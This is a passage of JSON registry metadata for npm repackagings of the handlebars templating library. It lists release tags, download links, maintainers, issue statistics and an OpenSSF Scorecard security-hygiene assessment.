name":"v2.0.0-alpha.1","sha":"a5ff1f3d22178b3889983be29b31b850a4528719","kind":"tag","published_at":"2014-02-19T23:49:09.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v2.0.0-alpha.1","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v2.0.0-alpha.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v2.0.0-alpha.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v2.0.0-alpha.1/manifests"},{"name":"v1.3.0","sha":"0c6829f8af189622afd726bb72c195b5323bd6f9","kind":"tag","published_at":"2014-01-02T04:10:31.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v1.3.0","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.3.0/manifests"},{"name":"v1.2.1","sha":"1c0614bd88b835b7cdfe1fb7f39650c18f645763","kind":"tag","published_at":"2013-12-26T22:25:42.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v1.2.1","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.2.1/manifests"},{"name":"v1.2.0","sha":"096b8ccd2e376d621fd281e08d557a4632188aaa","kind":"tag","published_at":"2013-12-24T03:39:46.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v1.2.0","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.2.0/manifests"},{"name":"v1.1.2","sha":"47d13cb23c968ada3878b8bacf2813fb01758475","kind":"tag","published_at":"2013-11-06T00:10:06.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v1.1.2","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.1.2/manifests"},{"name":"v1.1.1","sha":"09cdc19a21cd15059f1982f533bc65e2daae904d","kind":"tag","published_at":"2013-11-04T16:48:59.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v1.1.1","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.1.1/manifests"},{"name":"v1.1.0","sha":"c53e95414f4e74bf6dfb2379a6b9b2468b8fcb31","kind":"tag","published_at":"2013-11-04T05:00:42.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v1.1.0","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.1.0/manifests"},{"name":"1.0.0","sha":"2a073e0993b40b81fbef82f681bb1dd171f2233b","kind":"tag","published_at":"2013-05-31T18:17:56.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/1.0.0","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/1.0.0/manifests"},{"name":"v1.0.12","sha":"2a073e0993b40b81fbef82f681bb1dd171f2233b","kind":"tag","published_at":"2013-05-31T18:16:53.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v1.0.12","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v1.0.12","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.0.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.0.12/manifests"},{"name":"v1.0.11","sha":"4cf0410b7cc3e06f09b98bbc42a3d2df8e561eba","kind":"tag","published_at":"2013-05-14T04:09:21.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v1.0.11","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v1.0.11","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.0.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.0.11/manifests"},{"name":"1.0.0-rc.4","sha":"4cf0410b7cc3e06f09b98bbc42a3d2df8e561eba","kind":"commit","published_at":"2013-05-14T04:09:21.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/1.0.0-rc.4","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/1.0.0-rc.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/1.0.0-rc.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/1.0.0-rc.4/manifests"},{"name":"v1.0.7","sha":"b5074a88ec17917309f5482de004076f3f676ad1","kind":"tag","published_at":"2013-05-10T04:51:50.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v1.0.7","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v1.0.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.0.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.0.7/manifests"},{"name":"v1.0.10","sha":"948231a31d7d6786f1ea0a293a378b20928f6f2b","kind":"tag","published_at":"2013-02-27T13:52:34.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v1.0.10","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v1.0.10","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.0.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.0.10/manifests"},{"name":"v1.0.9","sha":"b74711e63b7bab7971cb1267f7f0bd9a60b525d7","kind":"tag","published_at":"2013-02-16T01:43:52.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v1.0.9","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v1.0.9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.0.9/manifests"},{"name":"1.0.0-rc.3","sha":"bc8214cb7cb4b04180f4df33439ac61a92e1123f","kind":"commit","published_at":"2013-02-15T05:58:20.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/1.0.0-rc.3","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/1.0.0-rc.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/1.0.0-rc.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/1.0.0-rc.3/manifests"},{"name":"v1.0.8","sha":"5ac29dcb50cea15bee830304e391afd7375d56aa","kind":"tag","published_at":"2013-01-19T08:12:36.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v1.0.8","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v1.0.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.0.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.0.8/manifests"},{"name":"1.0.rc.2","sha":"9453c6d9d23f05c596123560ff9b5923e4eed954","kind":"commit","published_at":"2013-01-19T01:13:40.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/1.0.rc.2","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/1.0.rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/1.0.rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/1.0.rc.2/manifests"},{"name":"1.0.rc.1","sha":"ce74c36118ffed1779889d97e6a2a1028ae61510","kind":"commit","published_at":"2012-09-16T04:11:36.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/1.0.rc.1","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/1.0.rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/1.0.rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/1.0.rc.1/manifests"},{"name":"v1.0.6-2","sha":"08e580a23be5abd74bdb757063bb783f4f240ea3","kind":"commit","published_at":"2012-07-31T16:50:55.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v1.0.6-2","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v1.0.6-2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.0.6-2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.0.6-2/manifests"},{"name":"v1.0.6","sha":"f5289a35ecdbd35898fa6d291600ac9427930b44","kind":"commit","published_at":"2012-07-23T20:40:07.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v1.0.6","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v1.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.0.6/manifests"},{"name":"v1.0.6beta","sha":"fe7d16de9196718bbe716d684f2a1c349f24284b","kind":"commit","published_at":"2012-07-23T15:36:13.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v1.0.6beta","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v1.0.6beta","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.0.6beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.0.6beta/manifests"},{"name":"v1.0.5beta","sha":"bef909f5cbf855f38f58c727d07dbe8330d4c370","kind":"commit","published_at":"2012-02-09T17:06:11.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v1.0.5beta","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v1.0.5beta","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.0.5beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.0.5beta/manifests"},{"name":"1.0.0.beta.1","sha":"81071dd22c5295d796ab702d910e167029e178c4","kind":"commit","published_at":"2011-05-04T03:39:24.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/1.0.0.beta.1","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/1.0.0.beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/1.0.0.beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/1.0.0.beta.1/manifests"},{"name":"0.9.0.pre.4","sha":"d7f93c09e7031b28b27296b1e8f8e8bc801e56c9","kind":"tag","published_at":"2011-02-15T21:44:08.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/0.9.0.pre.4","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/0.9.0.pre.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/0.9.0.pre.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/0.9.0.pre.4/manifests"}]},"repo_metadata_updated_at":"2024-10-29T23:16:05.077Z","dependent_packages_count":2,"downloads":54,"downloads_period":"last-month","dependent_repos_count":2,"rankings":{"downloads":24.324239350827366,"dependent_repos_count":7.624845079674312,"dependent_packages_count":8.842255668013637,"stargazers_count":0.7344990917680483,"forks_count":0.8621538777561605,"docker_downloads_count":null,"average":8.477598613607904},"purl":"pkg:npm/%40web3-storage/handlebars","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/npm/@web3-storage/handlebars","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/npm/@web3-storage/handlebars","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/npm/@web3-storage/handlebars/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2024-10-28T19:05:59.510Z","issues_count":148,"pull_requests_count":96,"avg_time_to_close_issue":23271243.37142857,"avg_time_to_close_pull_request":15945824.09375,"issues_closed_count":105,"pull_requests_closed_count":64,"pull_request_authors_count":33,"issue_authors_count":117,"avg_comments_per_issue":3.493243243243243,"avg_comments_per_pull_request":1.78125,"merged_pull_requests_count":42,"bot_issues_count":0,"bot_pull_requests_count":0,"past_year_issues_count":18,"past_year_pull_requests_count":9,"past_year_avg_time_to_close_issue":95338.875,"past_year_avg_time_to_close_pull_request":4026891.5,"past_year_issues_closed_count":8,"past_year_pull_requests_closed_count":4,"past_year_pull_request_authors_count":7,"past_year_issue_authors_count":16,"past_year_avg_comments_per_issue":1.6666666666666667,"past_year_avg_comments_per_pull_request":2.6666666666666665,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":0,"past_year_merged_pull_requests_count":3,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/issues","maintainers":[{"login":"jaylinski","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jaylinski"},{"login":"nknapp","count":22,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nknapp"}],"active_maintainers":[{"login":"jaylinski","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jaylinski"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@web3-storage%2Fhandlebars/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@web3-storage%2Fhandlebars/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@web3-storage%2Fhandlebars/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@web3-storage%2Fhandlebars/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@web3-storage%2Fhandlebars/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@web3-storage%2Fhandlebars/codemeta","maintainers":[{"uuid":"alanshaw","login":"alanshaw","name":null,"email":"alan138@gmail.com","url":null,"packages_count":451,"html_url":"https://www.npmjs.com/~alanshaw","role":null,"created_at":"2022-11-16T03:49:23.934Z","updated_at":"2022-11-16T03:49:23.934Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/alanshaw/packages"},{"uuid":"it-dag-house","login":"it-dag-house","name":null,"email":"it+npm@dag.house","url":null,"packages_count":108,"html_url":"https://www.npmjs.com/~it-dag-house","role":null,"created_at":"2022-11-16T03:49:23.539Z","updated_at":"2022-11-16T03:49:23.539Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/it-dag-house/packages"},{"uuid":"fforbeck","login":"fforbeck","name":null,"email":"fforbeck@gmail.com","url":null,"packages_count":67,"html_url":"https://www.npmjs.com/~fforbeck","role":null,"created_at":"2026-02-19T19:23:11.820Z","updated_at":"2026-02-19T19:23:11.820Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/fforbeck/packages"}],"registry":{"name":"npmjs.org","url":"https://registry.npmjs.org","ecosystem":"npm","default":true,"packages_count":5678686,"maintainers_count":1211412,"namespaces_count":399623,"keywords_count":847874,"github":"npm","metadata":{"funded_packages_count":171745},"icon_url":"https://github.com/npm.png","created_at":"2022-04-04T15:19:23.081Z","updated_at":"2026-06-10T05:11:46.456Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/namespaces"}},{"id":10418964,"name":"@langtail/handlebars","ecosystem":"npm","description":"Handlebars provides the power necessary to let you build semantic templates effectively with no frustration","homepage":"https://handlebarsjs.com/","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/handlebars-lang/handlebars.js","keywords_array":["handlebars","mustache","template","html"],"namespace":"langtail","versions_count":8,"first_release_published_at":"2024-06-21T13:20:12.175Z","latest_release_published_at":"2024-06-21T15:56:21.838Z","latest_release_number":"5.0.7","last_synced_at":"2026-07-19T22:22:29.935Z","created_at":"2024-06-21T16:10:56.616Z","updated_at":"2026-07-19T22:22:29.935Z","registry_url":"https://www.npmjs.com/package/@langtail/handlebars","install_command":"npm install @langtail/handlebars","documentation_url":null,"metadata":{"funding":null,"dist-tags":{"latest":"5.0.7"}},"repo_metadata":{"id":998342,"uuid":"809601","full_name":"handlebars-lang/handlebars.js","owner":"handlebars-lang","description":"Minimal templating on steroids.","archived":false,"fork":false,"pushed_at":"2026-06-24T23:40:45.000Z","size":4613,"stargazers_count":18652,"open_issues_count":110,"forks_count":2065,"subscribers_count":432,"default_branch":"master","last_synced_at":"2026-07-18T08:04:33.114Z","etag":null,"topics":["handlebars","mustache","templates"],"latest_commit_sha":null,"homepage":"http://handlebarsjs.com","language":"JavaScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":"linkedin/Burrow","license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/handlebars-lang.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":"CONTRIBUTING.md","funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null}},"created_at":"2010-07-31T18:54:46.000Z","updated_at":"2026-07-17T19:48:10.000Z","dependencies_parsed_at":"2023-09-22T06:08:40.588Z","dependency_job_id":"57b49b24-4bc7-4df8-b069-e31179883809","html_url":"https://github.com/handlebars-lang/handlebars.js","commit_stats":{"total_commits":1718,"total_committers":206,"mean_commits":8.339805825242719,"dds":0.519208381839348,"last_synced_commit":"f422bfdf3ed321c32c6eecfaa778de46275fb76d"},"previous_names":["wycats/handlebars.js"],"tags_count":90,"template":false,"template_full_name":null,"purl":"pkg:github/handlebars-lang/handlebars.js","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/handlebars-lang","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/sbom","scorecard":{"id":454219,"data":{"date":"2025-08-11","repo":{"name":"github.com/handlebars-lang/handlebars.js","commit":"cc8574e63121861c1c89ef495f9be89ef7dd2413"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":4,"checks":[{"name":"Code-Review","score":3,"reason":"Found 9/24 approved changesets -- score normalized to 3","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"Maintained","score":1,"reason":"1 commit(s) and 1 issue activity found in the last 90 days -- score normalized to 1","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: no topLevel permission defined: .github/workflows/ci.yml:1","Warn: no topLevel permission defined: .github/workflows/release.yml:1","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Pinned-Dependencies","score":2,"reason":"dependency not pinned by hash detected -- score normalized to 2","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/handlebars-lang/handlebars.js/ci.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:18: update your workflow using https://app.stepsecurity.io/secureworkflow/handlebars-lang/handlebars.js/ci.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/handlebars-lang/handlebars.js/ci.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:45: update your workflow using https://app.stepsecurity.io/secureworkflow/handlebars-lang/handlebars.js/ci.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:66: update your workflow using https://app.stepsecurity.io/secureworkflow/handlebars-lang/handlebars.js/ci.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:71: update your workflow using https://app.stepsecurity.io/secureworkflow/handlebars-lang/handlebars.js/ci.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/release.yml:18: update your workflow using https://app.stepsecurity.io/secureworkflow/handlebars-lang/handlebars.js/release.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/release.yml:23: update your workflow using https://app.stepsecurity.io/secureworkflow/handlebars-lang/handlebars.js/release.yml/master?enable=pin","Warn: npmCommand not pinned by hash: tests/integration/rollup-test/test.sh:7","Warn: npmCommand not pinned by hash: tests/integration/webpack-babel-test/test.sh:7","Warn: npmCommand not pinned by hash: tests/integration/webpack-test/test.sh:7","Info:   0 out of   8 GitHub-owned GitHubAction dependencies pinned","Info:   4 out of   7 npmCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 26 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code 